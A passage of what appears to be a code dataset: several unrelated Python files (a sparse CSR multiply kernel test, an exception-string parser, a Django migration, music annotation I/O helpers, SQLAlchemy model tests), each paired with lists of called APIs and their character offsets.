"azure.mgmt.core.AsyncARMPipelineClient"
] | [((2763, 3637), 'azure.profiles.ProfileDefinition', 'ProfileDefinition', (["{_PROFILE_TAG: {None: DEFAULT_API_VERSION, 'assets': '1.0.0',\n 'async_operations': 'v1.0', 'batch_job_deployment':\n '2020-09-01-dataplanepreview', 'batch_job_endpoint':\n '2020-09-01-dataplanepreview', 'data_call': '1.5.0', 'data_container':\n '1.5.0', 'data_version': '1.5.0', 'dataset_containers': '2021-10-01',\n 'dataset_controller_v2': '1.5.0', 'dataset_v2': '1.5.0',\n 'dataset_versions': '2021-10-01', 'datasets_v1': '1.5.0', 'delete':\n 'v1.0', 'events': 'v1.0', 'experiments': 'v1.0', 'extensive_model':\n '1.0.0', 'get_operation_status': '1.5.0', 'metric': 'v1.0', 'migration':\n '1.0.0', 'models': '1.0.0', 'registry_management_non_workspace': 'v1.0',\n 'run': 'v1.0', 'run_artifacts': 'v1.0', 'runs': 'v1.0', 'spans': 'v1.0',\n 'temporary_data_references': '2021-10-01-dataplanepreview'}}", "(_PROFILE_TAG + ' latest')"], {}), "({_PROFILE_TAG: {None: DEFAULT_API_VERSION, 'assets':\n '1.0.0', 'async_operations': 'v1.0', 'batch_job_deployment':\n '2020-09-01-dataplanepreview', 'batch_job_endpoint':\n '2020-09-01-dataplanepreview', 'data_call': '1.5.0', 'data_container':\n '1.5.0', 'data_version': '1.5.0', 'dataset_containers': '2021-10-01',\n 'dataset_controller_v2': '1.5.0', 'dataset_v2': '1.5.0',\n 'dataset_versions': '2021-10-01', 'datasets_v1': '1.5.0', 'delete':\n 'v1.0', 'events': 'v1.0', 'experiments': 'v1.0', 'extensive_model':\n '1.0.0', 'get_operation_status': '1.5.0', 'metric': 'v1.0', 'migration':\n '1.0.0', 'models': '1.0.0', 'registry_management_non_workspace': 'v1.0',\n 'run': 'v1.0', 'run_artifacts': 'v1.0', 'runs': 'v1.0', 'spans': 'v1.0',\n 'temporary_data_references': '2021-10-01-dataplanepreview'}}, \n _PROFILE_TAG + ' latest')\n", (2780, 3637), False, 'from azure.profiles import KnownProfiles, ProfileDefinition\n'), ((4382, 4454), 'azure.mgmt.core.AsyncARMPipelineClient', 'AsyncARMPipelineClient', ([], {'base_url': 'base_url', 'config': 'self._config'}), '(base_url=base_url, config=self._config, **kwargs)\n', (4404, 4454), False, 'from azure.mgmt.core import AsyncARMPipelineClient\n')] |
import numpy as np
import scipy.sparse
import akg
from akg import tvm
from akg import topi
from tests.common.base import get_rtol_atol
from tests.common.gen_random import random_gaussian
from tests.common.tensorio import compare_tensor
from akg.utils import kernel_exec as utils
from akg.utils.result_analysis import target_profiling
from akg.utils.format_transform import to_tvm_nd_array, get_shape
from akg.utils.dsl_create import get_broadcast_shape
def csr_mul(dense, sparse_data, col_idx, row_idx, shape):
assert len(shape) == 2, "only supports 2-dim sparse tensor"
assert len(dense.shape) <= 2
assert dense.dtype == sparse_data.dtype, "data and weight must have the same dtype"
num_rows = row_idx.shape[0] - 1
dense_shape = get_shape(dense.shape)
sparse_shape = get_shape(shape)
broadcast_shape = get_broadcast_shape(dense_shape, sparse_shape)
need_expand = tvm.const(len(dense_shape) < len(broadcast_shape))
need_broadcast_first_dim = tvm.const(
len(dense_shape) == len(broadcast_shape) and dense_shape[0] < broadcast_shape[0])
need_broadcast_last_dim = tvm.const(
len(dense_shape) == len(broadcast_shape) and dense_shape[1] < broadcast_shape[1])
def gen_ir(dense, sparse_data, col_idx, row_idx, output):
ib = tvm.ir_builder.create()
with ib.for_range(0, num_rows, name='i') as i:
start = ib.load(row_idx, i)
end = ib.load(row_idx, i + 1)
with ib.for_range(0, end - start, name='j') as j:
pos = start + j
with ib.if_scope(pos < end):
val = ib.load(sparse_data, pos)
col = ib.load(col_idx, pos)
with ib.if_scope(need_expand):
ib.store(output, pos, val * ib.load(dense, [col]))
with ib.else_scope():
with ib.if_scope(need_broadcast_first_dim):
ib.store(output, pos, val * ib.load(dense, [0, col]))
with ib.else_scope():
with ib.if_scope(need_broadcast_last_dim):
ib.store(output, pos, val * ib.load(dense, [i, 0]))
with ib.else_scope():
ib.store(output, pos, val * ib.load(dense, [i, col]))
return ib.get()
output_name = "T_csr_mul_" + dense.op.name + "_" + sparse_data.op.name
out_buf = tvm.decl_buffer(sparse_data.shape, sparse_data.dtype, output_name)
return tvm.extern([shape],
[dense, sparse_data, col_idx, row_idx],
lambda ins, outs: gen_ir(ins[0], ins[1], ins[2], ins[3], outs[0]),
dtype=sparse_data.dtype, out_buffers=[out_buf], name=output_name)
def gen_data(shape1, shape2, dtype1, dtype2):
dense = random_gaussian(shape1).astype(dtype1)
sparse_data = scipy.sparse.rand(shape2[0], shape2[1], density=0.2, format='csr', dtype=dtype1)
expect = sparse_data.multiply(np.broadcast_to(dense, shape2))
return dense, sparse_data.data, sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), expect.data
def test_csr_mul(shape1, shape2, dtype1, dtype2, poly_sch=False, attrs=None):
if not attrs:
attrs = {"target": "cuda"}
# gen data
op_attrs = [shape2]
dense, sparse_data, col_idx, row_idx, expect = gen_data(shape1, shape2, dtype1, dtype2)
output_shape = expect.shape
attrs["csr_avg_row"] = sparse_data.shape[0] // shape1[0]
mod = utils.op_build_test(csr_mul, [shape1, sparse_data.shape, col_idx.shape, row_idx.shape],
[dtype1, dtype1, dtype2, dtype2], op_attrs=op_attrs, polyhedral=poly_sch,
attrs=attrs, kernel_name="csr_mul")
if len(expect.shape) == 0:
output_shape = (1, )
output = np.zeros(output_shape, expect.dtype)
output = utils.mod_launch(mod, (dense, sparse_data, col_idx, row_idx, output), expect=expect)
atol, rtol = get_rtol_atol("csr_mul", dtype1)
res = compare_tensor(output, expect, rtol=rtol, atol=atol)
print("Test {}".format("Pass" if res else "Failed"))
target_name = attrs["target"].split()[0]
if not res:
mod_source = mod
if target_name != "llvm":
mod_source = mod.imported_modules[0]
print("Error {}:========================".format(target_name))
print(mod_source.get_source())
raise AssertionError("Test fail")
if attrs["profiling"]:
args_list = to_tvm_nd_array(
[dense, sparse_data, col_idx, row_idx, output, expect], akg.tvm.context(target_name, 0))
target_profiling(mod, *args_list, target=target_name, repeat_time=attrs["repeat_time"])
| [
"tests.common.tensorio.compare_tensor",
"akg.tvm.context",
"tests.common.gen_random.random_gaussian",
"tests.common.base.get_rtol_atol",
"akg.tvm.ir_builder.create",
"akg.utils.dsl_create.get_broadcast_shape",
"numpy.zeros",
"akg.utils.format_transform.get_shape",
"akg.tvm.decl_buffer",
"akg.utils.kernel_exec.op_build_test",
"akg.utils.result_analysis.target_profiling",
"numpy.broadcast_to",
"akg.utils.kernel_exec.mod_launch"
] | [((753, 775), 'akg.utils.format_transform.get_shape', 'get_shape', (['dense.shape'], {}), '(dense.shape)\n', (762, 775), False, 'from akg.utils.format_transform import to_tvm_nd_array, get_shape\n'), ((795, 811), 'akg.utils.format_transform.get_shape', 'get_shape', (['shape'], {}), '(shape)\n', (804, 811), False, 'from akg.utils.format_transform import to_tvm_nd_array, get_shape\n'), ((834, 880), 'akg.utils.dsl_create.get_broadcast_shape', 'get_broadcast_shape', (['dense_shape', 'sparse_shape'], {}), '(dense_shape, sparse_shape)\n', (853, 880), False, 'from akg.utils.dsl_create import get_broadcast_shape\n'), ((2458, 2524), 'akg.tvm.decl_buffer', 'tvm.decl_buffer', (['sparse_data.shape', 'sparse_data.dtype', 'output_name'], {}), '(sparse_data.shape, sparse_data.dtype, output_name)\n', (2473, 2524), False, 'from akg import tvm\n'), ((3548, 3753), 'akg.utils.kernel_exec.op_build_test', 'utils.op_build_test', (['csr_mul', '[shape1, sparse_data.shape, col_idx.shape, row_idx.shape]', '[dtype1, dtype1, dtype2, dtype2]'], {'op_attrs': 'op_attrs', 'polyhedral': 'poly_sch', 'attrs': 'attrs', 'kernel_name': '"""csr_mul"""'}), "(csr_mul, [shape1, sparse_data.shape, col_idx.shape,\n row_idx.shape], [dtype1, dtype1, dtype2, dtype2], op_attrs=op_attrs,\n polyhedral=poly_sch, attrs=attrs, kernel_name='csr_mul')\n", (3567, 3753), True, 'from akg.utils import kernel_exec as utils\n'), ((3881, 3917), 'numpy.zeros', 'np.zeros', (['output_shape', 'expect.dtype'], {}), '(output_shape, expect.dtype)\n', (3889, 3917), True, 'import numpy as np\n'), ((3931, 4019), 'akg.utils.kernel_exec.mod_launch', 'utils.mod_launch', (['mod', '(dense, sparse_data, col_idx, row_idx, output)'], {'expect': 'expect'}), '(mod, (dense, sparse_data, col_idx, row_idx, output),\n expect=expect)\n', (3947, 4019), True, 'from akg.utils import kernel_exec as utils\n'), ((4033, 4065), 'tests.common.base.get_rtol_atol', 'get_rtol_atol', (['"""csr_mul"""', 'dtype1'], {}), "('csr_mul', dtype1)\n", (4046, 4065), False, 'from tests.common.base import get_rtol_atol\n'), ((4076, 4128), 'tests.common.tensorio.compare_tensor', 'compare_tensor', (['output', 'expect'], {'rtol': 'rtol', 'atol': 'atol'}), '(output, expect, rtol=rtol, atol=atol)\n', (4090, 4128), False, 'from tests.common.tensorio import compare_tensor\n'), ((1289, 1312), 'akg.tvm.ir_builder.create', 'tvm.ir_builder.create', ([], {}), '()\n', (1310, 1312), False, 'from akg import tvm\n'), ((3030, 3060), 'numpy.broadcast_to', 'np.broadcast_to', (['dense', 'shape2'], {}), '(dense, shape2)\n', (3045, 3060), True, 'import numpy as np\n'), ((4680, 4772), 'akg.utils.result_analysis.target_profiling', 'target_profiling', (['mod', '*args_list'], {'target': 'target_name', 'repeat_time': "attrs['repeat_time']"}), "(mod, *args_list, target=target_name, repeat_time=attrs[\n 'repeat_time'])\n", (4696, 4772), False, 'from akg.utils.result_analysis import target_profiling\n'), ((2858, 2881), 'tests.common.gen_random.random_gaussian', 'random_gaussian', (['shape1'], {}), '(shape1)\n', (2873, 2881), False, 'from tests.common.gen_random import random_gaussian\n'), ((4639, 4670), 'akg.tvm.context', 'akg.tvm.context', (['target_name', '(0)'], {}), '(target_name, 0)\n', (4654, 4670), False, 'import akg\n')] |
import ast
EXCEPTION_TYPE_PREFIX = "<class 'webfaction_api.exceptions."
EXCEPTION_TYPE_SUFFIX = "'>"
def _parse_exc_type(exc_type):
# This is horribly hacky, but there's not a particularly elegant
# way to go from the exception type to a string representing that
# exception.
if not exc_type.startswith(EXCEPTION_TYPE_PREFIX):
return None
if not exc_type.endswith(EXCEPTION_TYPE_SUFFIX):
return None
return exc_type[len(EXCEPTION_TYPE_PREFIX):len(EXCEPTION_TYPE_SUFFIX) * -1]
def _parse_exc_message(exc_message):
if not exc_message:
return None
message = ast.literal_eval(exc_message)
if isinstance(message, list):
if not message:
return None
return message[0]
return None
class WebFactionFault(Exception):
def __init__(self, underlying):
self.underlying_fault = underlying
try:
exc_type, exc_message = underlying.faultString.split(':', 1)
self.exception_type = _parse_exc_type(exc_type)
self.exception_message = _parse_exc_message(exc_message)
except ValueError:
self.exception_type = None
self.exception_message = None
| [
"ast.literal_eval"
] | [((620, 649), 'ast.literal_eval', 'ast.literal_eval', (['exc_message'], {}), '(exc_message)\n', (636, 649), False, 'import ast\n')] |
# Generated by Django 2.2.9 on 2019-12-30 10:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('secret', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='secret',
name='expiry_date',
field=models.DateTimeField(blank=True, null=True),
),
]
| [
"django.db.models.DateTimeField"
] | [((329, 372), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'blank': '(True)', 'null': '(True)'}), '(blank=True, null=True)\n', (349, 372), False, 'from django.db import migrations, models\n')] |
# encoding: utf-8
"""
Input/output package.
"""
from __future__ import absolute_import, division, print_function
import io as _io
import contextlib
import numpy as np
from .audio import load_audio_file
from .midi import load_midi, write_midi
from ..utils import suppress_warnings, string_types
ENCODING = 'utf8'
# dtype for numpy structured arrays that contain labelled segments
# 'label' needs to be castable to str
SEGMENT_DTYPE = [('start', np.float), ('end', np.float), ('label', object)]
# overwrite the built-in open() to transparently apply some magic file handling
@contextlib.contextmanager
def open_file(filename, mode='r'):
"""
Context manager which yields an open file or handle with the given mode
and closes it if needed afterwards.
Parameters
----------
filename : str or file handle
File (handle) to open.
mode: {'r', 'w'}
Specifies the mode in which the file is opened.
Yields
------
Open file (handle).
"""
# check if we need to open the file
if isinstance(filename, string_types):
f = fid = _io.open(filename, mode)
else:
f = filename
fid = None
# yield an open file handle
yield f
# close the file if needed
if fid:
fid.close()
@suppress_warnings
def load_events(filename):
"""
Load a events from a text file, one floating point number per line.
Parameters
----------
filename : str or file handle
File to load the events from.
Returns
-------
numpy array
Events.
Notes
-----
Comments (lines starting with '#') and additional columns are ignored,
i.e. only the first column is returned.
"""
# read in the events, one per line
events = np.loadtxt(filename, ndmin=2)
# 1st column is the event's time, the rest is ignored
return events[:, 0]
def write_events(events, filename, fmt='%.3f', delimiter='\t', header=None):
"""
Write the events to a file, one event per line.
Parameters
----------
events : numpy array
Events to be written to file.
filename : str or file handle
File to write the events to.
fmt : str or sequence of strs, optional
A single format (e.g. '%.3f'), a sequence of formats, or a multi-format
string (e.g. '%.3f %.3f'), in which case `delimiter` is ignored.
delimiter : str, optional
String or character separating columns.
header : str, optional
String that will be written at the beginning of the file as comment.
"""
events = np.array(events)
# reformat fmt to be a single string if needed
if isinstance(fmt, (list, tuple)):
fmt = delimiter.join(fmt)
# write output
with open_file(filename, 'wb') as f:
# write header
if header is not None:
f.write(bytes(('# ' + header + '\n').encode(ENCODING)))
# write events
for e in events:
try:
string = fmt % tuple(e.tolist())
except AttributeError:
string = e
except TypeError:
string = fmt % e
f.write(bytes((string + '\n').encode(ENCODING)))
f.flush()
load_onsets = load_events
write_onsets = write_events
@suppress_warnings
def load_beats(filename, downbeats=False):
"""
Load the beats from the given file, one beat per line of format
'beat_time' ['beat_number'].
Parameters
----------
filename : str or file handle
File to load the beats from.
downbeats : bool, optional
Load only downbeats instead of beats.
Returns
-------
numpy array
Beats.
"""
values = np.loadtxt(filename, ndmin=1)
if values.ndim > 1:
if downbeats:
# rows with a "1" in the 2nd column are downbeats
return values[values[:, 1] == 1][:, 0]
else:
# 1st column is the beat time, the rest is ignored
return values[:, 0]
return values
def write_beats(beats, filename, fmt=None, delimiter='\t', header=None):
"""
Write the beats to a file.
Parameters
----------
beats : numpy array
Beats to be written to file.
filename : str or file handle
File to write the beats to.
fmt : str or sequence of strs, optional
A single format (e.g. '%.3f'), a sequence of formats (e.g.
['%.3f', '%d']), or a multi-format string (e.g. '%.3f %d'), in which
case `delimiter` is ignored.
delimiter : str, optional
String or character separating columns.
header : str, optional
String that will be written at the beginning of the file as comment.
"""
if fmt is None and beats.ndim == 2:
fmt = ['%.3f', '%d']
elif fmt is None:
fmt = '%.3f'
write_events(beats, filename, fmt, delimiter, header)
def load_downbeats(filename):
"""
Load the downbeats from the given file.
Parameters
----------
filename : str or file handle
File to load the downbeats from.
Returns
-------
numpy array
Downbeats.
"""
return load_beats(filename, downbeats=True)
def write_downbeats(beats, filename, fmt=None, delimiter='\t', header=None):
"""
Write the downbeats to a file.
Parameters
----------
beats : numpy array
Beats or downbeats to be written to file.
filename : str or file handle
File to write the beats to.
fmt : str or sequence of strs, optional
A single format (e.g. '%.3f'), a sequence of formats (e.g.
['%.3f', '%d']), or a multi-format string (e.g. '%.3f %d'), in which
case `delimiter` is ignored.
delimiter : str, optional
String or character separating columns.
header : str, optional
String that will be written at the beginning of the file as comment.
Notes
-----
If `beats` contains both time and number of the beats, they are filtered
to contain only the downbeats (i.e. only the times of those beats with a
beat number of 1).
"""
if beats.ndim == 2:
beats = beats[beats[:, 1] == 1][:, 0]
if fmt is None:
fmt = '%.3f'
write_events(beats, filename, fmt, delimiter, header)
@suppress_warnings
def load_notes(filename):
"""
Load the notes from the given file, one note per line of format
'onset_time' 'note_number' ['duration' ['velocity']].
Parameters
----------
filename: str or file handle
File to load the notes from.
Returns
-------
numpy array
Notes.
"""
return np.loadtxt(filename, ndmin=2)
def write_notes(notes, filename, fmt=None, delimiter='\t', header=None):
"""
Write the notes to a file.
Parameters
----------
notes : numpy array, shape (num_notes, 2)
Notes, row format 'onset_time' 'note_number' ['duration' ['velocity']].
filename : str or file handle
File to write the notes to.
fmt : str or sequence of strs, optional
A sequence of formats (e.g. ['%.3f', '%d', '%.3f', '%d']), or a
multi-format string, e.g. '%.3f %d %.3f %d', in which case `delimiter`
is ignored.
delimiter : str, optional
String or character separating columns.
header : str, optional
String that will be written at the beginning of the file as comment.
Returns
-------
numpy array
Notes.
"""
# set default format
if fmt is None:
fmt = ['%.3f', '%d', '%.3f', '%d']
if not notes.ndim == 2:
raise ValueError('unknown format for `notes`')
# truncate format to the number of colums given
fmt = delimiter.join(fmt[:notes.shape[1]])
# write the notes
write_events(notes, filename, fmt=fmt, delimiter=delimiter, header=header)
def load_segments(filename):
"""
Load labelled segments from file, one segment per line. Each segment is of
form <start> <end> <label>, where <start> and <end> are floating point
numbers, and <label> is a string.
Parameters
----------
filename : str or file handle
File to read the labelled segments from.
Returns
-------
segments : numpy structured array
Structured array with columns 'start', 'end', and 'label',
containing the beginning, end, and label of segments.
"""
start, end, label = [], [], []
with open_file(filename) as f:
for line in f:
s, e, l = line.split()
start.append(float(s))
end.append(float(e))
label.append(l)
segments = np.zeros(len(start), dtype=SEGMENT_DTYPE)
segments['start'] = start
segments['end'] = end
segments['label'] = label
return segments
def write_segments(segments, filename, fmt=None, delimiter='\t', header=None):
"""
Write labelled segments to a file.
Parameters
----------
segments : numpy structured array
Labelled segments, one per row (column definition see SEGMENT_DTYPE).
filename : str or file handle
Output filename or handle.
fmt : str or sequence of strs, optional
A sequence of formats (e.g. ['%.3f', '%.3f', '%s']), or a multi-format
string (e.g. '%.3f %.3f %s'), in which case `delimiter` is ignored.
delimiter : str, optional
String or character separating columns.
header : str, optional
String that will be written at the beginning of the file as comment.
Returns
-------
numpy structured array
Labelled segments
Notes
-----
Labelled segments are represented as numpy structured array with three
named columns: 'start' contains the start position (e.g. seconds),
'end' the end position, and 'label' the segment label.
"""
if fmt is None:
fmt = ['%.3f', '%.3f', '%s']
write_events(segments, filename, fmt=fmt, delimiter=delimiter,
header=header)
load_chords = load_segments
write_chords = write_segments
def load_key(filename):
"""
Load the key from the given file.
Parameters
----------
filename : str or file handle
File to read key information from.
Returns
-------
str
Key.
"""
with open_file(filename) as f:
return f.read().strip()
def write_key(key, filename, header=None):
"""
Write key string to a file.
Parameters
----------
key : str
Key name.
filename : str or file handle
Output file.
header : str, optional
String that will be written at the beginning of the file as comment.
Returns
-------
key : str
Key name.
"""
write_events([key], filename, fmt='%s', header=header)
def load_tempo(filename, split_value=1., sort=None, norm_strengths=None,
max_len=None):
"""
Load tempo information from the given file.
Tempo information must have the following format:
'main tempo' ['secondary tempo' ['relative_strength']]
Parameters
----------
filename : str or file handle
File to load the tempo from.
split_value : float, optional
Value to distinguish between tempi and strengths.
`values` > `split_value` are interpreted as tempi [bpm],
`values` <= `split_value` are interpreted as strengths.
sort : bool, deprecated
Sort the tempi by their strength.
norm_strengths : bool, deprecated
Normalize the strengths to sum 1.
max_len : int, deprecated
Return at most `max_len` tempi.
Returns
-------
tempi : numpy array, shape (num_tempi[, 2])
Array with tempi. If no strength is parsed, a 1-dimensional array of
length 'num_tempi' is returned. If strengths are given, a 2D array
with tempi (first column) and their relative strengths (second column)
is returned.
"""
# try to load the data from file
values = np.loadtxt(filename, ndmin=1)
# split the filename according to their filename into tempi and strengths
# TODO: this is kind of hack-ish, find a better solution
tempi = values[values > split_value]
strengths = values[values <= split_value]
# make the strengths behave properly
strength_sum = np.sum(strengths)
# relative strengths are given (one less than tempi)
if len(tempi) - len(strengths) == 1:
strengths = np.append(strengths, 1. - strength_sum)
if np.any(strengths < 0):
raise AssertionError('strengths must be positive')
# no strength is given, assume an evenly distributed one
if strength_sum == 0:
strengths = np.ones_like(tempi) / float(len(tempi))
# normalize the strengths
if norm_strengths is not None:
import warnings
warnings.warn('`norm_strengths` is deprecated as of version 0.16 and '
'will be removed in 0.18. Please normalize strengths '
'separately.')
strengths /= float(strength_sum)
# tempi and strengths must have same length
if len(tempi) != len(strengths):
raise AssertionError('tempi and strengths must have same length')
# order the tempi according to their strengths
if sort:
import warnings
warnings.warn('`sort` is deprecated as of version 0.16 and will be '
'removed in 0.18. Please sort the returned array '
'separately.')
# Note: use 'mergesort', because we want a stable sorting algorithm
# which keeps the order of the keys in case of duplicate keys
# but we need to apply this '(-strengths)' trick because we want
# tempi with uniformly distributed strengths to keep their order
sort_idx = (-strengths).argsort(kind='mergesort')
tempi = tempi[sort_idx]
strengths = strengths[sort_idx]
# return at most 'max_len' tempi and their relative strength
if max_len is not None:
import warnings
warnings.warn('`max_len` is deprecated as of version 0.16 and will be '
'removed in 0.18. Please truncate the returned array '
'separately.')
return np.vstack((tempi[:max_len], strengths[:max_len])).T
def write_tempo(tempi, filename, delimiter='\t', header=None, mirex=None):
"""
Write the most dominant tempi and the relative strength to a file.
Parameters
----------
tempi : numpy array
Array with the detected tempi (first column) and their strengths
(second column).
filename : str or file handle
Output file.
delimiter : str, optional
String or character separating columns.
header : str, optional
String that will be written at the beginning of the file as comment.
mirex : bool, deprecated
Report the lower tempo first (as required by MIREX).
Returns
-------
tempo_1 : float
The most dominant tempo.
tempo_2 : float
The second most dominant tempo.
strength : float
Their relative strength.
"""
# make the given tempi a 2d array
tempi = np.array(tempi, ndmin=2)
# default values
t1 = t2 = strength = np.nan
# only one tempo was detected
if len(tempi) == 1:
t1 = tempi[0][0]
strength = 1.
# consider only the two strongest tempi and strengths
elif len(tempi) > 1:
t1, t2 = tempi[:2, 0]
strength = tempi[0, 1] / sum(tempi[:2, 1])
# for MIREX, the lower tempo must be given first
if mirex is not None:
import warnings
warnings.warn('`mirex` argument is deprecated as of version 0.16 '
'and will be removed in version 0.17. Please sort the '
'tempi manually')
if t1 > t2:
t1, t2, strength = t2, t1, 1. - strength
# format as a numpy array and write to output
out = np.array([t1, t2, strength], ndmin=2)
write_events(out, filename, fmt=['%.2f', '%.2f', '%.2f'],
delimiter=delimiter, header=header)
| [
"numpy.sum",
"numpy.ones_like",
"numpy.any",
"numpy.append",
"numpy.array",
"numpy.loadtxt",
"io.open",
"warnings.warn",
"numpy.vstack"
] | [((1773, 1802), 'numpy.loadtxt', 'np.loadtxt', (['filename'], {'ndmin': '(2)'}), '(filename, ndmin=2)\n', (1783, 1802), True, 'import numpy as np\n'), ((2590, 2606), 'numpy.array', 'np.array', (['events'], {}), '(events)\n', (2598, 2606), True, 'import numpy as np\n'), ((3721, 3750), 'numpy.loadtxt', 'np.loadtxt', (['filename'], {'ndmin': '(1)'}), '(filename, ndmin=1)\n', (3731, 3750), True, 'import numpy as np\n'), ((6644, 6673), 'numpy.loadtxt', 'np.loadtxt', (['filename'], {'ndmin': '(2)'}), '(filename, ndmin=2)\n', (6654, 6673), True, 'import numpy as np\n'), ((11974, 12003), 'numpy.loadtxt', 'np.loadtxt', (['filename'], {'ndmin': '(1)'}), '(filename, ndmin=1)\n', (11984, 12003), True, 'import numpy as np\n'), ((12290, 12307), 'numpy.sum', 'np.sum', (['strengths'], {}), '(strengths)\n', (12296, 12307), True, 'import numpy as np\n'), ((15168, 15192), 'numpy.array', 'np.array', (['tempi'], {'ndmin': '(2)'}), '(tempi, ndmin=2)\n', (15176, 15192), True, 'import numpy as np\n'), ((15944, 15981), 'numpy.array', 'np.array', (['[t1, t2, strength]'], {'ndmin': '(2)'}), '([t1, t2, strength], ndmin=2)\n', (15952, 15981), True, 'import numpy as np\n'), ((1102, 1126), 'io.open', '_io.open', (['filename', 'mode'], {}), '(filename, mode)\n', (1110, 1126), True, 'import io as _io\n'), ((12426, 12466), 'numpy.append', 'np.append', (['strengths', '(1.0 - strength_sum)'], {}), '(strengths, 1.0 - strength_sum)\n', (12435, 12466), True, 'import numpy as np\n'), ((12477, 12498), 'numpy.any', 'np.any', (['(strengths < 0)'], {}), '(strengths < 0)\n', (12483, 12498), True, 'import numpy as np\n'), ((12807, 12951), 'warnings.warn', 'warnings.warn', (['"""`norm_strengths` is deprecated as of version 0.16 and will be removed in 0.18. Please normalize strengths separately."""'], {}), "(\n '`norm_strengths` is deprecated as of version 0.16 and will be removed in 0.18. Please normalize strengths separately.'\n )\n", (12820, 12951), False, 'import warnings\n'), ((13288, 13426), 'warnings.warn', 'warnings.warn', (['"""`sort` is deprecated as of version 0.16 and will be removed in 0.18. Please sort the returned array separately."""'], {}), "(\n '`sort` is deprecated as of version 0.16 and will be removed in 0.18. Please sort the returned array separately.'\n )\n", (13301, 13426), False, 'import warnings\n'), ((14032, 14177), 'warnings.warn', 'warnings.warn', (['"""`max_len` is deprecated as of version 0.16 and will be removed in 0.18. Please truncate the returned array separately."""'], {}), "(\n '`max_len` is deprecated as of version 0.16 and will be removed in 0.18. Please truncate the returned array separately.'\n )\n", (14045, 14177), False, 'import warnings\n'), ((14229, 14278), 'numpy.vstack', 'np.vstack', (['(tempi[:max_len], strengths[:max_len])'], {}), '((tempi[:max_len], strengths[:max_len]))\n', (14238, 14278), True, 'import numpy as np\n'), ((15626, 15770), 'warnings.warn', 'warnings.warn', (['"""`mirex` argument is deprecated as of version 0.16 and will be removed in version 0.17. Please sort the tempi manually"""'], {}), "(\n '`mirex` argument is deprecated as of version 0.16 and will be removed in version 0.17. Please sort the tempi manually'\n )\n", (15639, 15770), False, 'import warnings\n'), ((12670, 12689), 'numpy.ones_like', 'np.ones_like', (['tempi'], {}), '(tempi)\n', (12682, 12689), True, 'import numpy as np\n')] |
from acondbs.db.sa import sa
from acondbs.models import Map, Beam
# These tests are written primarily for the developer to understand
# how models in flask_sqlalchemy work.
# __________________________________________________________________||
def test_simple(app):
'''A simple test of adding an object
'''
with app.app_context():
# save the initial number of the maps to compare later
nmaps = len(Map.query.all())
# this instantiation doesn't need be within a app context
map1 = Map(name="map1")
with app.app_context():
sa.session.add(map1)
sa.session.commit()
with app.app_context():
# test the number of the maps is increased by one
assert (nmaps + 1) == len(Map.query.all())
# the new map can be retrieved in a different app context
map1_ = Map.query.filter_by(name='map1').first()
assert isinstance(map1_, Map)
# __________________________________________________________________||
def test_python_object(app):
'''A simple test about Python object
'''
map1 = Map(name="map1")
with app.app_context():
sa.session.add(map1)
sa.session.commit()
map1_ = Map.query.filter_by(name='map1').first()
# the query returns the same Python object
assert map1 is map1_
with app.app_context():
map1_ = Map.query.filter_by(name='map1').first()
# In a different app context, no longer the same Python object
assert map1 is not map1_
# __________________________________________________________________||
def test_primary_key(app):
'''A simple test about the primary key
'''
map1 = Map(name="map1")
# The primary key (map_id) is None at this point
assert map1.map_id is None
with app.app_context():
sa.session.add(map1)
sa.session.commit()
# After the commit, map_id is automatically assigned
map_id = map1.map_id
assert map_id is not None
with app.app_context():
# The object can be retrived by the map_id in another context
map1 = Map.query.filter_by(map_id=map_id).first()
assert 'map1' == map1.name
# __________________________________________________________________||
def test_relation(app):
'''A simple test of adding an object with relation
'''
map1 = Map(name="map1")
beam1 = Beam(name="beam1", map=map1)
# The relation has been already established
assert map1 is beam1.map
assert [beam1] == map1.beams
# The primary and foreign keys are still None
assert map1.map_id is None
assert beam1.beam_id is None
assert beam1.input_map_id is None
with app.app_context():
sa.session.add(map1)
sa.session.commit()
# The primary keys are assigned
assert map1.map_id is not None
assert beam1.beam_id is not None
# The foreign key is correctly set
assert map1.map_id == beam1.input_map_id
with app.app_context():
map1 = Map.query.filter_by(name='map1').first()
beam1 = Beam.query.filter_by(name='beam1').first()
# The relation is preserved in a different app context
assert map1 is beam1.map
assert beam1 is map1.beams[0]
assert map1.map_id == beam1.input_map_id
# __________________________________________________________________||
| [
"acondbs.db.sa.sa.session.commit",
"acondbs.db.sa.sa.session.add",
"acondbs.models.Map",
"acondbs.models.Map.query.filter_by",
"acondbs.models.Map.query.all",
"acondbs.models.Beam",
"acondbs.models.Beam.query.filter_by"
] | [((521, 537), 'acondbs.models.Map', 'Map', ([], {'name': '"""map1"""'}), "(name='map1')\n", (524, 537), False, 'from acondbs.models import Map, Beam\n'), ((1087, 1103), 'acondbs.models.Map', 'Map', ([], {'name': '"""map1"""'}), "(name='map1')\n", (1090, 1103), False, 'from acondbs.models import Map, Beam\n'), ((1682, 1698), 'acondbs.models.Map', 'Map', ([], {'name': '"""map1"""'}), "(name='map1')\n", (1685, 1698), False, 'from acondbs.models import Map, Beam\n'), ((2359, 2375), 'acondbs.models.Map', 'Map', ([], {'name': '"""map1"""'}), "(name='map1')\n", (2362, 2375), False, 'from acondbs.models import Map, Beam\n'), ((2388, 2416), 'acondbs.models.Beam', 'Beam', ([], {'name': '"""beam1"""', 'map': 'map1'}), "(name='beam1', map=map1)\n", (2392, 2416), False, 'from acondbs.models import Map, Beam\n'), ((575, 595), 'acondbs.db.sa.sa.session.add', 'sa.session.add', (['map1'], {}), '(map1)\n', (589, 595), False, 'from acondbs.db.sa import sa\n'), ((604, 623), 'acondbs.db.sa.sa.session.commit', 'sa.session.commit', ([], {}), '()\n', (621, 623), False, 'from acondbs.db.sa import sa\n'), ((1141, 1161), 'acondbs.db.sa.sa.session.add', 'sa.session.add', (['map1'], {}), '(map1)\n', (1155, 1161), False, 'from acondbs.db.sa import sa\n'), ((1170, 1189), 'acondbs.db.sa.sa.session.commit', 'sa.session.commit', ([], {}), '()\n', (1187, 1189), False, 'from acondbs.db.sa import sa\n'), ((1821, 1841), 'acondbs.db.sa.sa.session.add', 'sa.session.add', (['map1'], {}), '(map1)\n', (1835, 1841), False, 'from acondbs.db.sa import sa\n'), ((1850, 1869), 'acondbs.db.sa.sa.session.commit', 'sa.session.commit', ([], {}), '()\n', (1867, 1869), False, 'from acondbs.db.sa import sa\n'), 